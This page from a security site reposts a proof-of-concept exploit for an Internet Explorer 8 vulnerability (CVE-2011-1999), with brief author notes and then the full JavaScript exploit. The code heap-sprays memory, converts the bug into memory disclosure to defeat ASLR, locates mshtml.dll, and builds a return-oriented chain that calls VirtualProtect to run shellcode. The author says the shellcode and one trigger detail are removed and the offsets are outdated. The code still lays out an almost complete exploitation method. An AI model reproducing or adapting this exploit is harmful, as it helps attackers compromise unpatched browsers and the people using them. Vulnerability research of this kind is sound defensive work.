首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Internet Explorer 8 Code Execution
来源:vfocus.net 作者:Fratric 发布时间:2012-03-01  
Below is the PoC code for CVE-2011-1999 (MS11-081) that accompanies my
blog article
"Reliable Windows 7 Exploitation: A Case Study"
http://ifsec.blogspot.com/2012/02/reliable-windows-7-exploitation-case.html

Some notes about the PoC code:
 - The exploit uses a single vulnerability to both bypass ASLR and
execute the payload without requiring any non-ASLR module in memory.
 - One tiny detail required for triggering the vulnerability has been
removed, so the exploit (as given below) should not work, even on
vulnerable systems. No, I won't tell you what it is. Sorry kids, this
is for educational purposes only.
 - All offsets in the code were correct for mshtml.dll at the time
this exploit code was written. As some time has passed between then
and the time the vulnerability was patched, they won't be correct for
many vulnerable versions of this module. Writing the exploit that
doesn't rely on any hardcoded offsets is left as an exercise for the
reader (more difficult, but certainly possible with the combination of
the techniques used in the PoC below).



<html>
<head>
</head>

<body>


<script type="text/javascript">
<!--

//originally, windows 7 compatible calc.exe shellcode from SkyLined
var scode = "removed";

var newstack,newstackaddr;
var fakeobj;

var spray,spray2,selarray,readindex,readaddr,optarryaddr;
var elms = new Array();

var optarray;

var mshtmlbase;

//option object that is to be corrupted
var corruptedoption;
var corruptedoptionaddr;
var corruptaddr;

function strtoint(str) {
	return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}

function inttostr(num) {
	return String.fromCharCode(num%65536,Math.floor(num/65536));
}

function crash() {
	var o = new Option();
	selarray[99].options.add(o,-0x20000000);
}

function readmem(addr) {
	if(addr < readaddr) alert("Error, can't read that address");
	return strtoint(spray[readindex].substr((addr-readaddr)/2,2));
}

function readmem2(addr,size) {
	if(addr < readaddr) alert("Error, can't read that address");
	return spray[readindex].substr((addr-readaddr)/2,size/2);
}

function overwrite(addr) {
	try {
		var index = (addr-optarryaddr)/4 - 0x40000000;
		selarray[99].options.add(optarray.pop(),index);
	} catch(err) {}	
}

function getreadaddr() {
	readaddr = 0;
	var indexarray = new Array();
	var tmpaddr = 0;
	var i,index;
	
	index = readmem(tmpaddr);
	indexarray.push(index);
	
	while(1) {
		tmpaddr += 0x100000;
		index = readmem(tmpaddr);
		for(i=0;i<indexarray.length;i++) {
			if(indexarray[i]==index+1) {
				readaddr = readmem(tmpaddr-0x24)-i*0x100000+0x24;
				return 1;
			} else if(indexarray[i]==index-1) {
				readaddr = readmem(tmpaddr-0x20)-i*0x100000+0x24;
				return 1;				
			}
		}
		indexarray.push(index);
	}
}

//leverages the vulnerability into memory disclosure
function initread() {
	//overwrite something in a heap spray slide
	try {
		selarray[99].options.add(optarray.pop(),-100000000/4);
	} catch(err) {}
	
	//now find what and where exectly did we overwrite
	readindex = -1;
	var i;
	for(i=1;i<200;i++) {
		if(spray[0].substring(2,spray[0].length-2)!=spray[i].substring(2,spray[0].length-2))
{
			readindex = i;
			break;
		}
	}

	if(readindex == -1) {
		alert("Error overwriring first spray");
		return 0;
	}

	var start=2,len=spray[readindex].length-2,mid;
	while(len>10) {
		mid = Math.round(len/2);
		mid = mid - mid%2;
		if(spray[readindex].substr(start,mid) !=
spray[readindex-1].substr(start,mid)) {
			len = mid;
		} else {
			start = start+mid;
			len = len-mid;
			//if(spray[readindex].substr(start,mid) ==
spray[readindex-1].substr(start,mid)) alert("error");
		}
	}
	
	for(i=start;i<(start+20);i=i+2) {
		if(spray[readindex].substr(i,2) != spray[readindex-1].substr(i,2)) {
			break;
		}
	}
	
	//overwrite the string length
	try {
		selarray[99].options.add(optarray.pop(),-100000000/4-i/2-1);
	} catch(err) {}
		
	if(spray[readindex].length == spray[readindex-1].length) alert("error
overwriting string length");
	
	//readaddr = strtoint(spray[readindex].substr((0x100000-4-0x20+4)/2,2))+0x24;
	getreadaddr();
	
	optarryaddr = readaddr + 100000000 + i*2;

	return 1;	
}

function trysploit() {
	//create some helper objects
	for(var i =0; i < 100; i++) {
		elms.push(document.createElement('div'));
	}

	//force the option cache to rebuild itself
	var tmp1 = selarray[99].options[70].text;

	//overwrite the CTreeNode pointer
	overwrite(corruptaddr);
	//read the address of the option object we overwrited with
	var optadr = readmem(corruptaddr);
	//delete the option object...
	selarray[99].options.remove(0);
	
	CollectGarbage();
	
	//...and allocate some strings in its place
	for(var i = 0; i < elms.length; i++) {
		elms[i].className = fakeobj;
	}

	//verify we overwrote the deleted option object successfully
	if(readmem(optadr) != strtoint(fakeobj.substr(0,2))) return 0;

	alert("success, calc.exe should start once you close this message box");

	//now do something with the corrupted option object
	corruptedoption.parentNode.click();
}

function hs() {
	
	//first heap spray, nop slide + shellcode	
	spray = new Array(200);
	var pattern = unescape("%u0C0C%u0C0C");
	while(pattern.length<(0x100000/2)) pattern+=pattern;
	pattern = pattern.substr(0,0x100000/2-0x100);
	for(var i=0;i<200;i++) {
		spray[i] = [inttostr(i)+pattern+scode].join("");
	}

	//fill small gaps, we wan everything _behind_ our heap spray so that
we can read it
	var asmall = new Array(10000);
	pattern = "aaaa";
	while(pattern.length<500) pattern+=pattern;
	for(var i=0;i<10000;i++) {
		asmall[i]=[pattern+pattern].join("");
	}
	
	//create some select and option elements
	selarray = new Array(100);
	for(var i=0;i<100;i++) {
		selarray[i] = document.createElement("select");
		for(var j=0;j<100;j++) {
			var o = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
			selarray[i].options.add(o,0);
		}
	}
	
	//create some extra option elements
	optarray = new Array(10000);
	for(var i=0;i<10000;i++) {
		optarray[i] = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
	}
	
	//enable memory disclosure
	if(initread()==0) return;

	//force the option cache to rebuild itself
	var tmp1 = selarray[99].options[60].text;
	
	//get the address of some option element to be corrupted, also remove
it from its select element, we don't want anything else messing with
it
	corruptedoptionaddr = readmem(optarryaddr+60*4);
	corruptedoption = selarray[99].options[60];
	selarray[99].options.remove(60);
	
	//get the base address of mshtml.dll based on the vtable address
inside the option object
	mshtmlbase = readmem(corruptedoptionaddr)-0xFC0C0;
	alert("base address of mshtml.dll : " + mshtmlbase.toString(16));

	//we'll overwrite the pointer to the CTreeNode object, compute its address
	corruptaddr = corruptedoptionaddr+0x14;

	//second heap-spray, this one will act as a stack (we'll exchange
stack pointer with a pointer into this)
	spray2 = new Array(200);	

	//some address that is likely to be inside the "stack"
	newstackaddr = optarryaddr+100000000;
	newstackaddr-=newstackaddr%0x1000;
	newstackaddr+=0x24;

	//assemble the "stack" so that it calls VirtualProtect on the firs
shellcode and then jumps into it through return-oriented-programming
	newstack = inttostr(newstackaddr+0x10)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(newstackaddr+0x14)+inttostr(mshtmlbase+0x14EF7)+inttostr(mshtmlbase+0x1348)+inttostr(mshtmlbase+0x801E8)+inttostr(readaddr+0x100000-0x24)+inttostr(0x100000)+inttostr(0x40)+inttostr(readaddr+0x1000)+inttostr(readaddr+0x101000)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(mshtmlbase+0x1B43F);
	while(newstack.length<(0x1000/2))
newstack+=unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA");
	newstack = newstack.substr(0,0x1000/2);
	while(newstack.length<(0x100000/2)) newstack+=newstack;
	newstack = newstack.substr(0,0x100000/2-0x100);
	for(var i=0;i<200;i++) {
		spray2[i] = [newstack].join("");
	}
	
	//constract a fake object which will replace a deleted option object
(it has to be the same size)
	//fakeobj = unescape("%u4141%u4141")+inttostr(newstackaddr)+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
	fakeobj = unescape("%u4141%u4141%u4141%u4141")+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
	
	//loop until we either achieve command execution or fail
	for(var i=0;i<100;i++) {
		trysploit();
	}
	
	alert("Exploit failed, try again");

}


hs();


-->
</script>


</body>
</html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Novell Groupwise Address Book
·ImgPals Photo Host Version 1.0
·Netmechanica NetDecision Dashb
·VLC Media Player RealText Subt
·Netmechanica NetDecision Traff
·DJ Studio Pro 5.1 .pls Stack B
·Netmechanica NetDecision HTTP
·FlashFXP v4.1.8.1701 - Buffer
·IBM Personal Communications I-
·Ashampoo Photo Commander 9 .ti
·ASUS Net4Switch ipswcom.dll Ac
·Splash Pro Hd Player (.avi) De
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved